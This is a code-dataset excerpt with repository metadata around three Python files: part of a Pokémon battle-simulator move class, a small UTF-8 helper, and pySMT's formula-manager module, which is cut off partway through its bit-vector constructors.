PokemonType[t.upper().replace("'", "")]
for t in self.entry["ignoreImmunity"].keys()
}
return False
@property
def is_empty(self) -> bool:
"""
:return: Whether the move is an empty move.
:rtype: bool
"""
return self._is_empty
@property
def is_protect_counter(self) -> bool:
"""
:return: Wheter this move increments a mon's protect counter.
:rtype: int
"""
return self._id in _PROTECT_COUNTER_MOVES
@property
def is_protect_move(self) -> bool:
"""
:return: Wheter this move is a protect-like move.
:rtype: int
"""
return self._id in _PROTECT_MOVES
@property
def is_side_protect_move(self) -> bool:
"""
:return: Wheter this move is a side-protect move.
:rtype: int
"""
return self._id in _SIDE_PROTECT_MOVES
@property
def is_z(self) -> bool:
"""
:return: Whether the move is a z move.
:rtype: bool
"""
return Move.is_id_z(self.id)
@property
def max_pp(self) -> int:
"""
:return: The move's max pp.
:rtype: int
"""
return self.entry["pp"]
@property
def n_hit(self) -> Tuple:
"""
:return: How many hits this move lands. Tuple of the form (min, max).
:rtype: Tuple
"""
if "multihit" in self.entry:
if isinstance(self.entry["multihit"], list):
return tuple(self.entry["multihit"])
else:
return self.entry["multihit"], self.entry["multihit"]
return 1, 1
@property
def no_pp_boosts(self) -> bool:
"""
:return: Whether the move uses PPs.
:rtype: bool
"""
return "noPPBoosts" in self.entry
@property
def non_ghost_target(self) -> bool:
"""
:return: True for curse.
:rtype: bool
"""
return "nonGhostTarget" in self.entry
@property
def priority(self) -> int:
"""
:return: Move priority.
:rtype: int
"""
return self.entry["priority"]
@property
def pseudo_weather(self) -> str:
"""
:return: Pseudo-weather activated by this move.
:rtype: str
"""
return self.entry.get("pseudoWeather", None)
@property
def recoil(self) -> float:
"""
:return: Proportion of the move's damage inflicted as recoil.
:rtype: float
"""
if "recoil" in self.entry:
return self.entry["recoil"][0] / self.entry["recoil"][1]
elif "struggleRecoil" in self.entry:
return 0.25
return 0.0
@property
def request_target(self) -> Optional[str]:
"""
:return: Target information sent by showdown in a request message, if any.
:rtype: str, optional
"""
return self._request_target
@request_target.setter
def request_target(self, request_target: Optional[str]) -> None:
"""
:param request_target: Target information received from showdown in a request
message.
"type request_target: str, optional
"""
self._request_target = request_target
@staticmethod
@lru_cache(maxsize=4096)
def retrieve_id(move_name: str) -> str:
"""Retrieve the id of a move based on its full name.
:param move_name: The string to convert into a move id.
:type move_name: str
:return: The corresponding move id.
:rtype: str
"""
move_name = to_id_str(move_name)
if move_name.startswith("return"):
return "return"
if move_name.startswith("frustration"):
return "frustration"
return move_name
@property
def secondary(self) -> List[dict]:
"""
:return: Secondary effects. At this point, the precise content of this property
is not too clear.
:rtype: Optional[Dict]
"""
if "secondary" in self.entry and self.entry["secondary"]:
return [self.entry["secondary"]]
elif "secondaries" in self.entry:
return self.entry["secondaries"]
return []
@property
def self_boost(self) -> Optional[Dict[str, int]]:
"""
:return: Boosts applied to the move's user.
:rtype: Dict[str, int]
"""
if "selfBoost" in self.entry:
return self.entry["selfBoost"].get("boosts", None)
elif "self" in self.entry and "boosts" in self.entry["self"]:
return self.entry["self"]["boosts"]
return None
@property
def self_destruct(self) -> Optional[str]:
"""
:return: Move's self destruct consequences.
:rtype: Optional[str]
"""
return self.entry.get("selfdestruct", None)
@property
def self_switch(self) -> Union[str, bool]:
"""
:return: What kind of self swtich this move implies for the user.
:rtype: Optional[str]
"""
return self.entry.get("selfSwitch", False)
@property
def side_condition(self) -> Optional[str]:
"""
:return: Side condition inflicted by the move.
:rtype: Optional[str]
"""
return self.entry.get("sideCondition", None)
@property
def sleep_usable(self) -> bool:
"""
:return: Whether the move can be user by a sleeping pokemon.
:rtype: bool
"""
return self.entry.get("sleepUsable", False)
@property
def slot_condition(self) -> Optional[str]:
"""
:return: Which slot condition is started by this move.
:rtype: Optional[str]
"""
return self.entry.get("slotCondition", None)
@property
def stalling_move(self) -> bool:
"""
:return: Showdown classification of the move as a stalling move.
:rtype: bool
"""
return self.entry.get("stallingMove", False)
@property
def status(self) -> Optional[Status]:
"""
:return: The status inflicted by the move.
:rtype: Optional[Status]
"""
if "status" in self.entry:
return Status[self.entry["status"].upper()]
return None
@property
def steals_boosts(self) -> bool:
"""
:return: Whether the move steals its target's boosts.
:rtype: bool
"""
return self.entry.get("stealsBoosts", False)
@property
def target(self) -> str:
"""
:return: Move target. Possible targets (copied from PS codebase):
* adjacentAlly - Only relevant to Doubles or Triples, the move only
targets an ally of the user.
* adjacentAllyOrSelf - The move can target the user or its ally.
* adjacentFoe - The move can target a foe, but not (in Triples)
a distant foe.
* all - The move targets the field or all Pokémon at once.
* allAdjacent - The move is a spread move that also hits the user's ally.
* allAdjacentFoes - The move is a spread move.
* allies - The move affects all active Pokémon on the user's team.
* allySide - The move adds a side condition on the user's side.
* allyTeam - The move affects all unfainted Pokémon on the user's team.
* any - The move can hit any other active Pokémon, not just those adjacent.
* foeSide - The move adds a side condition on the foe's side.
* normal - The move can hit one adjacent Pokémon of your choice.
* randomNormal - The move targets an adjacent foe at random.
* scripted - The move targets the foe that damaged the user.
* self - The move affects the user of the move.
:rtype: str
"""
return self.entry["target"]
@property
def terrain(self) -> Optional[Field]:
"""
:return: Terrain started by the move.
:rtype: Optional[Field]
"""
terrain = self.entry.get("terrain", None)
if terrain is not None:
terrain = Field.from_showdown_message(terrain)
return terrain
@property
def thaws_target(self) -> bool:
"""
:return: Whether the move thaws its target.
:rtype: bool
"""
return self.entry.get("thawsTarget", False)
@property
def type(self) -> PokemonType:
"""
:return: Move type.
:rtype: PokemonType
"""
return PokemonType[self.entry["type"].upper()]
@property
def use_target_offensive(self) -> bool:
"""
:return: Whether the move uses the target's offensive statistics.
:rtype: bool
"""
return self.entry.get("useTargetOffensive", False)
@property
def volatile_status(self) -> Optional[str]:
"""
:return: Volatile status inflicted by the move.
:rtype: Optional[str]
"""
return self.entry.get("volatileStatus", None)
@property
def weather(self) -> Optional[Weather]:
"""
:return: Weather started by the move.
:rtype: Optional[Weather]
"""
if "weather" in self.entry:
return Weather[self.entry["weather"].upper()]
return None
@property
def z_move_boost(self) -> Optional[Dict[str, int]]:
"""
:return: Boosts associated with the z-move version of this move.
:rtype: Dict[str, int]
"""
if "zMove" in self.entry and "boost" in self.entry["zMove"]:
return self.entry["zMove"]["boost"]
return None
@property
def z_move_effect(self) -> Optional[str]:
"""
:return: Effects associated with the z-move version of this move.
:rtype: Optional[str]
"""
if "zMove" in self.entry and "effect" in self.entry["zMove"]:
return self.entry["zMove"]["effect"]
return None
@property
def z_move_power(self) -> int:
"""
:return: Base power of the z-move version of this move.
:rtype: int
"""
if "zMove" in self.entry and "basePower" in self.entry["zMove"]:
return self.entry["zMove"]["basePower"]
elif self.category == MoveCategory.STATUS:
return 0
base_power = self.base_power
if self.n_hit != (1, 1):
base_power *= 3
elif base_power <= 55:
return 100
elif base_power <= 65:
return 120
elif base_power <= 75:
return 140
elif base_power <= 85:
return 160
elif base_power <= 95:
return 175
elif base_power <= 100:
return 180
elif base_power <= 110:
return 185
elif base_power <= 125:
return 190
elif base_power <= 130:
return 195
return 200
class EmptyMove(Move):
def __init__(self, move_id):
self._id: str = move_id
self._is_empty: bool = True
def __getattribute__(self, name):
try:
return super(Move, self).__getattribute__(name)
except (AttributeError, TypeError, ValueError):
return 0
class Gen4Move(Move):
_MOVES_DICT = GEN_TO_MOVES[4]
class Gen5Move(Move):
_MOVES_DICT = GEN_TO_MOVES[5]
class Gen6Move(Move):
_MOVES_DICT = GEN_TO_MOVES[6]
class Gen7Move(Move):
_MOVES_DICT = GEN_TO_MOVES[7]
class Gen8Move(Move):
_MOVES_DICT = GEN_TO_MOVES[8]
GEN_TO_MOVE_CLASS = {4: Gen4Move, 5: Gen5Move, 6: Gen6Move, 7: Gen7Move, 8: Gen8Move}
SPECIAL_MOVES = {"struggle": Move("struggle"), "recharge": EmptyMove("recharge")}
class DynamaxMove(Move):
BOOSTS_MAP = {
PokemonType.BUG: {"spa": -1},
PokemonType.DARK: {"spd": -1},
PokemonType.DRAGON: {"atk": -1},
PokemonType.GHOST: {"def": -1},
PokemonType.NORMAL: {"spe": -1},
}
SELF_BOOSTS_MAP = {
PokemonType.FIGHTING: {"atk": +1},
PokemonType.FLYING: {"spe": +1},
PokemonType.GROUND: {"spd": +1},
PokemonType.POISON: {"spa": +1},
PokemonType.STEEL: {"def": +1},
}
TERRAIN_MAP = {
PokemonType.ELECTRIC: Field.ELECTRIC_TERRAIN,
PokemonType.FAIRY: Field.MISTY_TERRAIN,
PokemonType.GRASS: Field.GRASSY_TERRAIN,
PokemonType.PSYCHIC: Field.PSYCHIC_TERRAIN,
}
WEATHER_MAP = {
PokemonType.FIRE: Weather.SUNNYDAY,
PokemonType.ICE: Weather.HAIL,
PokemonType.ROCK: Weather.SANDSTORM,
PokemonType.WATER: Weather.RAINDANCE,
}
def __init__(self, parent: Move):
self._parent: Move = parent
def __getattr__(self, name):
return getattr(self._parent, name)
@property
def accuracy(self):
return 1
@property
def base_power(self) -> int:
if self.category != MoveCategory.STATUS:
base_power = self._parent.base_power
if self.type in {PokemonType.POISON, PokemonType.FIGHTING}:
if base_power < 40:
return 70
if base_power < 50:
return 75
if base_power < 60:
return 80
if base_power < 70:
return 85
if base_power < 100:
return 90
if base_power < 140:
return 95
return 100
else:
if base_power < 40:
return 90
if base_power < 50:
return 100
if base_power < 60:
return 110
if base_power < 70:
return 120
if base_power < 100:
return 130
if base_power < 140:
return 140
return 150
return 0
@property
def boosts(self) -> Optional[Dict[str, float]]:
if self.category != MoveCategory.STATUS:
return self.BOOSTS_MAP.get(self.type, None)
return None
@property
def breaks_protect(self):
return False
@property
def crit_ratio(self):
return 0
@property
def damage(self):
return 0
@property
def defensive_category(self):
return self.category
@property
def expected_hits(self):
return 1
@property
def force_switch(self):
return False
@property
def heal(self):
return 0
@property
def is_protect_counter(self):
return self.category == MoveCategory.STATUS
@property
def is_protect_move(self):
return self.category == MoveCategory.STATUS
@property
def n_hit(self):
return 1
@property
def priority(self):
return 0
@property
def recoil(self):
return 0
@property
def self_boost(self) -> Optional[Dict[str, float]]:
if self.category != MoveCategory.STATUS:
return self.SELF_BOOSTS_MAP.get(self.type, None)
return None
@property
def status(self):
return None
@property
def terrain(self) -> Optional[Field]:
if self.category != MoveCategory.STATUS:
return self.TERRAIN_MAP.get(self.type, None)
return None
@property
def weather(self) -> Optional[Weather]:
if self.category != MoveCategory.STATUS:
return self.WEATHER_MAP.get(self.type, None)
return None
| 28.151616
| 87
| 0.561896
|
93e752bccc620675c309699f0bc5d503d9c962aa
| 131
|
py
|
Python
|
easylife/utils.py
|
JaniszM/easylife
|
37ce67f9a36de52a8118c1a98e9279c43e2b5061
|
[
"MIT"
] | 1
|
2021-01-01T15:53:49.000Z
|
2021-01-01T15:53:49.000Z
|
easylife/utils.py
|
JaniszM/easylife
|
37ce67f9a36de52a8118c1a98e9279c43e2b5061
|
[
"MIT"
] | null | null | null |
easylife/utils.py
|
JaniszM/easylife
|
37ce67f9a36de52a8118c1a98e9279c43e2b5061
|
[
"MIT"
] | null | null | null |
# coding=utf-8
def convert_to_utf8(value):
if isinstance(value, str):
value = value.encode("utf-8")
return value
| 16.375
| 37
| 0.641221
|
4348a8bcda43a6916174132cfb857845f3c4c712
| 48,560
|
py
|
Python
|
pysmt/formula.py
|
soarlab/pysmt
|
f9a5243657060d120158b68acfd15120979fee42
|
[
"Apache-2.0"
] | 3
|
2021-03-22T00:11:48.000Z
|
2021-04-05T20:09:04.000Z
|
pysmt/formula.py
|
soarlab/pysmt
|
f9a5243657060d120158b68acfd15120979fee42
|
[
"Apache-2.0"
] | 3
|
2020-01-07T05:14:01.000Z
|
2021-03-23T03:24:48.000Z
|
pysmt/formula.py
|
soarlab/pysmt
|
f9a5243657060d120158b68acfd15120979fee42
|
[
"Apache-2.0"
] | 2
|
2019-12-18T18:09:02.000Z
|
2021-03-28T08:57:07.000Z
|
#
# This file is part of pySMT.
#
# Copyright 2014 Andrea Micheli and Marco Gario
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""The FormulaManager is used to create formulae.
All objects are memoized so that two syntactically equivalent formulae
are represented by the same object.
The FormulaManager provides many more constructors than the operators
defined (operators.py). This is because many operators are rewritten,
and therefore are only virtual. Common examples are GE, GT that are
rewritten as LE and LT. Similarly, the operator Xor is rewritten using
its definition.
"""
import sys
if sys.version_info >= (3, 3):
from collections.abc import Iterable
else:
from collections import Iterable
from six.moves import xrange
import pysmt.typing as types
import pysmt.operators as op
from pysmt.fnode import FNode, FNodeContent
from pysmt.exceptions import UndefinedSymbolError, PysmtValueError,PysmtTypeError
from pysmt.walkers.identitydag import IdentityDagWalker
from pysmt.constants import Fraction
from pysmt.constants import (is_pysmt_fraction,
is_pysmt_integer,
is_python_rational,
is_python_integer,
is_python_string,
pysmt_fraction_from_rational,
pysmt_integer_from_integer)
class FormulaManager(object):
"""FormulaManager is responsible for the creation of all formulae."""
def __init__(self, env=None):
self.env = env
# Attributes for handling symbols and formulae
self.formulae = {}
self.symbols = {}
self._fresh_guess = 0
# get_type() from TypeChecker will be initialized lazily
self.get_type = None
self._next_free_id = 1
self.int_constants = {}
self.real_constants = {}
self.string_constants = {}
self.true_formula = self.create_node(node_type=op.BOOL_CONSTANT,
args=tuple(),
payload=True)
self.false_formula = self.create_node(node_type=op.BOOL_CONSTANT,
args=tuple(),
payload=False)
return
def _do_type_check_real(self, formula):
self.get_type(formula)
def _do_type_check(self, formula):
self.get_type = self.env.stc.get_type
self._do_type_check = self._do_type_check_real
return self._do_type_check(formula)
def create_node(self, node_type, args, payload=None):
content = FNodeContent(node_type, args, payload)
if content in self.formulae:
return self.formulae[content]
else:
n = FNode(content, self._next_free_id)
self._next_free_id += 1
self.formulae[content] = n
self._do_type_check(n)
return n
def _create_symbol(self, name, typename=types.BOOL):
if len(name) == 0:
raise PysmtValueError("Empty string is not a valid name")
if not isinstance(typename, types.PySMTType):
raise PysmtValueError("typename must be a PySMTType.")
n = self.create_node(node_type=op.SYMBOL,
args=tuple(),
payload=(name, typename))
self.symbols[name] = n
return n
def new_fresh_symbol(self, typename, base="FV%d"):
count = self._fresh_guess
while (base % count) in self.symbols:
count = count + 1
name = (base % count)
self._fresh_guess = count + 1
v = self.Symbol(name, typename)
assert v is not None
return v
def get_symbol(self, name):
try:
return self.symbols[name]
except KeyError:
raise UndefinedSymbolError(name)
def get_all_symbols(self):
return self.symbols.values()
def get_or_create_symbol(self, name, typename):
s = self.symbols.get(name, None)
if s is None:
return self._create_symbol(name, typename)
if not s.symbol_type() == typename:
raise PysmtTypeError("Trying to redefine symbol '%s' with a new type"
". Previous type was '%s' new type is '%s'" %
(name, s.symbol_type(), typename))
return s
# Node definitions start here
def Symbol(self, name, typename=types.BOOL):
return self.get_or_create_symbol(name, typename)
def FreshSymbol(self, typename=types.BOOL, template=None):
if template is None:
return self.new_fresh_symbol(typename)
return self.new_fresh_symbol(typename, template)
def ForAll(self, variables, formula):
""" Creates an expression of the form:
Forall variables. formula(variables)
Restrictions:
- Formula must be of boolean type
- Variables must be BOOL, REAL or INT
"""
if len(variables) == 0:
return formula
return self.create_node(node_type=op.FORALL,
args=(formula,),
payload=tuple(variables))
def Exists(self, variables, formula):
""" Creates an expression of the form:
Exists variables. formula(variables)
Restrictions:
- Formula must be of boolean type
- Variables must be BOOL, REAL or INT
"""
if len(variables) == 0:
return formula
return self.create_node(node_type=op.EXISTS,
args=(formula,),
payload=tuple(variables))
def Function(self, vname, params):
"""Returns the function application of vname to params.
Note: Applying a 0-arity function returns the function itself.
"""
if len(params) == 0:
return vname
assert len(params) == len(vname.symbol_type().param_types)
return self.create_node(node_type=op.FUNCTION,
args=tuple(params),
payload=vname)
def Not(self, formula):
""" Creates an expression of the form:
not formula
Restriction: Formula must be of boolean type
"""
if formula.is_not():
return formula.arg(0)
return self.create_node(node_type=op.NOT, args=(formula,))
def Implies(self, left, right):
""" Creates an expression of the form:
left -> right
Restriction: Left and Right must be of boolean type
"""
return self.create_node(node_type=op.IMPLIES, args=(left, right))
def Iff(self, left, right):
""" Creates an expression of the form:
left <-> right
Restriction: Left and Right must be of boolean type
"""
return self.create_node(node_type=op.IFF, args=(left, right))
def Minus(self, left, right):
""" Creates an expression of the form:
left - right
Restriction: Left and Right must be both INT or REAL type
"""
return self.create_node(node_type=op.MINUS, args=(left, right))
def Times(self, *args):
""" Creates a multiplication of terms
This function has polimorphic n-arguments:
- Times(a,b,c)
- Times([a,b,c])
Restriction:
- Arguments must be all of the same type
- Arguments must be INT or REAL
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
raise PysmtTypeError("Cannot create a Times without arguments.")
if len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.TIMES,
args=tuple_args)
def Pow(self, base, exponent):
""" Creates the n-th power of the base.
The exponent must be a constant.
"""
if not exponent.is_constant():
raise PysmtValueError("The exponent of POW must be a constant.", exponent)
if base.is_constant():
val = base.constant_value() ** exponent.constant_value()
if base.is_constant(types.REAL):
return self.Real(val)
else:
assert base.is_constant(types.INT)
return self.Int(val)
return self.create_node(node_type=op.POW, args=(base, exponent))
def Div(self, left, right, reduce_const=True):
""" Creates an expression of the form: left / right """
if reduce_const:
if right.is_constant(types.REAL):
# If right is a constant we rewrite as left * 1/right
inverse = Fraction(1) / right.constant_value()
return self.Times(left, self.Real(inverse))
elif right.is_constant(types.INT):
raise NotImplementedError
# This is a non-linear expression
return self.create_node(node_type=op.DIV,
args=(left, right))
def Equals(self, left, right):
""" Creates an expression of the form: left = right
For the boolean case use Iff
"""
return self.create_node(node_type=op.EQUALS,
args=(left, right))
def NotEquals(self, left, right):
""" Creates an expression of the form: left != right"""
return self.Not(self.Equals(left, right))
def GE(self, left, right):
""" Creates an expression of the form:
left >= right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LE, args=(right, left))
def GT(self, left, right):
""" Creates an expression of the form:
left > right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LT, args=(right, left))
def LE(self, left, right):
""" Creates an expression of the form:
left <= right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LE, args=(left, right))
def LT(self, left, right):
""" Creates an expression of the form:
left < right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LT, args=(left, right))
def Ite(self, iff, left, right):
""" Creates an expression of the form:
if( iff ) then left else right
Restriction:
- Iff must be BOOL
- Left and Right must be both of the same type
"""
return self.create_node(node_type=op.ITE, args=(iff, left, right))
def Real(self, value):
""" Returns a Real-type constant of the given value.
value can be:
- A Fraction(n,d)
- A tuple (n,d)
- A long or int n
- A float
- (Optionally) a mpq or mpz object
"""
if value in self.real_constants:
return self.real_constants[value]
if is_pysmt_fraction(value):
val = value
elif type(value) == tuple:
val = Fraction(value[0], value[1])
elif is_python_rational(value):
val = pysmt_fraction_from_rational(value)
else:
raise PysmtTypeError("Invalid type in constant. The type was:" + \
str(type(value)))
n = self.create_node(node_type=op.REAL_CONSTANT,
args=tuple(),
payload=val)
self.real_constants[value] = n
return n
def Int(self, value):
"""Return a constant of type INT."""
if value in self.int_constants:
return self.int_constants[value]
if is_pysmt_integer(value):
val = value
elif is_python_integer(value):
val = pysmt_integer_from_integer(value)
else:
raise PysmtTypeError("Invalid type in constant. The type was:" + \
str(type(value)))
n = self.create_node(node_type=op.INT_CONSTANT,
args=tuple(),
payload=val)
self.int_constants[value] = n
return n
def String(self, value):
"""Return a constant of type STRING."""
if value in self.string_constants:
return self.string_constants[value]
if is_python_string(value):
n = self.create_node(node_type=op.STR_CONSTANT,
args=tuple(),
payload=value)
self.string_constants[value] = n
return n
else:
raise TypeError("Invalid type in constant. The type was:" + \
str(type(value)))
def TRUE(self):
"""Return the boolean constant True."""
return self.true_formula
def FALSE(self):
"""Return the boolean constant False."""
return self.false_formula
def Bool(self, value):
if type(value) != bool:
raise PysmtTypeError("Expecting bool, got %s" % type(value))
if value:
return self.true_formula
else:
return self.false_formula
def And(self, *args):
""" Returns a conjunction of terms.
This function has polimorphic arguments:
- And(a,b,c)
- And([a,b,c])
Restriction: Arguments must be boolean
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
return self.TRUE()
elif len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.AND,
args=tuple_args)
def Or(self, *args):
""" Returns an disjunction of terms.
This function has polimorphic n-arguments:
- Or(a,b,c)
- Or([a,b,c])
Restriction: Arguments must be boolean
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
return self.FALSE()
elif len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.OR,
args=tuple_args)
def Plus(self, *args):
""" Returns an sum of terms.
This function has polimorphic n-arguments:
- Plus(a,b,c)
- Plus([a,b,c])
Restriction:
- Arguments must be all of the same type
- Arguments must be INT or REAL
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
raise PysmtTypeError("Cannot create a Plus without arguments.")
if len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.PLUS,
args=tuple_args)
def ToReal(self, formula):
""" Cast a formula to real type. """
t = self.env.stc.get_type(formula)
if t == types.REAL:
# Ignore casting of a Real
return formula
elif t == types.INT:
if formula.is_int_constant():
return self.Real(formula.constant_value())
return self.create_node(node_type=op.TOREAL,
args=(formula,))
else:
raise PysmtTypeError("Argument is of type %s, but INT was "
"expected!\n" % t)
def RealToInt(self, formula):
""" Cast a real formula to the int
that is no more than the real. """
return self.create_node(node_type=op.REALTOINT,
args=(formula,))
def Ceiling(self, formula):
""" Cast a real formula to the int
that is at least as large as the real. """
int_val = self.RealToInt(formula)
cond = self.Equals(self.ToReal(int_val), formula)
return self.Ite(cond, int_val, self.Plus(int_val, self.Int(1)))
def Truncate(self, formula):
""" Truncate a real formula to int. """
cond = self.GE(formula, self.Real(0))
return self.Ite(cond, self.RealToInt(formula), self.Ceiling(formula))
def AtMostOne(self, *args):
""" At most one of the bool expressions can be true at anytime.
This using a quadratic encoding:
A -> !(B \/ C)
B -> !(C)
"""
bool_exprs = self._polymorph_args_to_tuple(args)
constraints = []
for (i, elem) in enumerate(bool_exprs[:-1], start=1):
constraints.append(self.Implies(elem,
self.Not(self.Or(bool_exprs[i:]))))
return self.And(constraints)
def ExactlyOne(self, *args):
""" Encodes an exactly-one constraint on the boolean symbols.
This using a quadratic encoding:
A \/ B \/ C
A -> !(B \/ C)
B -> !(C)
"""
args = self._polymorph_args_to_tuple(args)
return self.And(self.Or(*args),
self.AtMostOne(*args))
def AllDifferent(self, *args):
""" Encodes the 'all-different' constraint using two possible
encodings.
AllDifferent(x, y, z) := (x != y) & (x != z) & (y != z)
"""
exprs = self._polymorph_args_to_tuple(args)
res = []
for i, a in enumerate(exprs):
for b in exprs[i+1:]:
res.append(self.Not(self.EqualsOrIff(a, b)))
return self.And(res)
def Xor(self, left, right):
"""Returns the xor of left and right: left XOR right """
return self.Not(self.Iff(left, right))
def Min(self, *args):
"""Returns the encoding of the minimum expression within args"""
exprs = self._polymorph_args_to_tuple(args)
assert len(exprs) > 0
if len(exprs) == 1:
return exprs[0]
elif len(exprs) == 2:
a, b = exprs
return self.Ite(self.LE(a, b), a, b)
else:
h = len(exprs) // 2
return self.Min(self.Min(exprs[0:h]), self.Min(exprs[h:]))
def Max(self, *args):
"""Returns the encoding of the maximum expression within args"""
exprs = self._polymorph_args_to_tuple(args)
assert len(exprs) > 0
if len(exprs) == 1:
return exprs[0]
elif len(exprs) == 2:
a, b = exprs
return self.Ite(self.LE(a, b), b, a)
else:
h = len(exprs) // 2
return self.Max(self.Max(exprs[0:h]), self.Max(exprs[h:]))
def EqualsOrIff(self, left, right):
"""Returns Equals() or Iff() depending on the type of the arguments.
This can be used to deal with ambiguous cases where we might be
dealing with both Theory and Boolean atoms.
"""
type_ = self.env.stc.get_type(left)
if type_.is_bool_type():
return self.Iff(left, right)
else:
return self.Equals(left, right)
# BitVectors
def BV(self, value, width=None):
"""Return a constant of type BitVector.
value can be either:
- a string of 0s and 1s
- a string starting with "#b" followed by a sequence of 0s and 1s
- an integer number s.t. 0 <= value < 2**width
In order to create the BV representation of a signed integer,
the SBV() method shall be used.
"""
if type(value) is str:
if value.startswith("#b"):
str_width = len(value)-2
value = int(value[2:],2)
elif all(v in ["0", "1"] for v in value):
str_width = len(value)
value = int(value, 2)
else:
raise PysmtValueError("Expecting binary value as string, got " \
"%s instead." % value)
if width is not None and width != str_width:
raise PysmtValueError("Specified width does not match string " \
"width (%d != %d)" % (width, str_width))
width = str_width
if width is None:
raise PysmtValueError("Need to specify a width for the constant")
if is_pysmt_integer(value):
_value = value
elif is_python_integer(value):
_value = pysmt_integer_from_integer(value)
else:
raise PysmtTypeError("Invalid type in constant. The type was: %s" \
% str(type(value)))
if _value < 0:
raise PysmtValueError("Cannot specify a negative value: %d" \
% _value)
if _value >= 2**width:
raise PysmtValueError("Cannot express %d in %d bits" \
% (_value, width))
return self.create_node(node_type=op.BV_CONSTANT,
args=tuple(),
payload=(_value, width))
def SBV(self, value, width=None):
"""Returns a constant of type BitVector interpreting the sign.
If the specified value is an integer, it is converted in the
2-complement representation of the given number, otherwise the
behavior is the same as BV().
"""
if is_python_integer(value):
if width is None:
raise PysmtValueError("Need to specify a width for the constant")
min_val = -(2**(width-1))
max_val = (2**(width-1)) - 1
if value < min_val:
raise PysmtValueError("Cannot represent a value (%d) lower " \
"than %d in %d bits" % (value, min_val,
width))
if value > max_val:
raise PysmtValueError("Cannot represent a value (%d) greater " \
"than %d in %d bits" % (value, max_val,
width))
if value >= 0:
return self.BV(value, width)
else:
comp_value = (2**width) + value # value is negative!
return self.BV(comp_value, width)
else:
return self.BV(value, width=width)
def BVOne(self, width):
"""Returns the bit-vector representing the unsigned one."""
return self.BV(1, width=width)
def BVZero(self, width):
"""Returns the bit-vector with all bits set to zero."""
return self.BV(0, width=width)
def BVNot(self, formula):
"""Returns the bitvector Not(bv)"""
return self.create_node(node_type=op.BV_NOT,
args=(formula,),
payload=(formula.bv_width(),))
def BVAnd(self, left, right):
"""Returns the Bit-wise AND of two bitvectors of the same size."""
return self.create_node(node_type=op.BV_AND,
args=(left,right),
payload=(left.bv_width(),))
def BVOr(self, left, right):
"""Returns the Bit-wise OR of two bitvectors of the same size."""
return self.create_node(node_type=op.BV_OR,
args=(left,right),
payload=(left.bv_width(),))
def BVXor(self, left, right):
"""Returns the Bit-wise XOR of two bitvectors of the same size."""
return self.create_node(node_type=op.BV_XOR,
args=(left,right),
payload=(left.bv_width(),))
def BVConcat(self, left, right):
"""Returns the Concatenation of the two BVs"""
return self.create_node(node_type=op.BV_CONCAT,
args=(left,right),
payload=(left.bv_width()+right.bv_width(),))
def BVExtract(self, formula, start=0, end=None):
"""Returns the slice of formula from start to end (inclusive)."""
if end is None: end = formula.bv_width()-1
assert is_python_integer(start) and is_python_integer(end)
assert end >= start and start >= 0, "Start: %d ; End: %d" % (start,end)
size = end-start+1
assert size <= formula.bv_width(), \
"Invalid size: start=%d, end=%d, width=%d" % \
(start, end, formula.bv_width())
return self.create_node(node_type=op.BV_EXTRACT,
args=(formula,),
payload=(size, start, end))
def BVULT(self, left, right):
"""Returns the formula left < right."""
return self.create_node(node_type=op.BV_ULT,
args=(left, right))
def BVUGT(self, left, right):
"""Returns the formula left > right."""
return self.create_node(node_type=op.BV_ULT,
args=(right, left))
def BVULE(self, left, right):
"""Returns the formula left <= right."""
return self.create_node(node_type=op.BV_ULE,
args=(left, right))
def BVUGE(self, left, right):
"""Returns the formula left >= right."""
return self.create_node(node_type=op.BV_ULE,
args=(right, left))
def BVNeg(self, formula):
"""Returns the arithmetic negation of the BV."""
return self.create_node(node_type=op.BV_NEG,
args=(formula,),
payload=(formula.bv_width(),))
def BVAdd(self, left, right):
"""Returns the sum of two BV."""
return self.create_node(node_type=op.BV_ADD,
args=(left, right),
payload=(left.bv_width(),))
def BVSub(self, left, right):
"""Returns the difference of two BV."""
return self.create_node(node_type=op.BV_SUB,
args=(left, right),
payload=(left.bv_width(),))
def BVMul(self, left, right):
"""Returns the product of two BV."""
return self.create_node(node_type=op.BV_MUL,
args=(left, right),
payload=(left.bv_width(),))
def BVUDiv(self, left, right):
"""Returns the division of the two BV."""
return self.create_node(node_type=op.BV_UDIV,
args=(left, right),
payload=(left.bv_width(),))
def BVURem(self, left, right):
"""Returns the reminder of the two BV."""
return self.create_node(node_type=op.BV_UREM,
args=(left, right),
payload=(left.bv_width(),))
def BVLShl(self, left, right):
"""Returns the logical left shift the BV."""
if is_python_integer(right):
right = self.BV(right, left.bv_width())
return self.create_node(node_type=op.BV_LSHL,
args=(left, right),
payload=(left.bv_width(),))
def BVLShr(self, left, right):
"""Returns the logical right shift the BV."""
if is_python_integer(right):
right = self.BV(right, left.bv_width())
return self.create_node(node_type=op.BV_LSHR,
args=(left, right),
payload=(left.bv_width(),))
def BVRol(self, formula, steps):
"""Returns the LEFT rotation of the BV by the number of steps."""
if not is_python_integer(steps):
raise PysmtTypeError("BVRol: 'steps' should be an integer. Got %s" \
% steps)
return self.create_node(node_type=op.BV_ROL,
args=(formula,),
payload=(formula.bv_width(), steps))
def BVRor(self, formula, steps):
"""Returns the RIGHT rotation of the BV by the number of steps."""
if not is_python_integer(steps):
raise PysmtTypeError("BVRor: 'steps' should be an integer. Got %s" \
% steps)
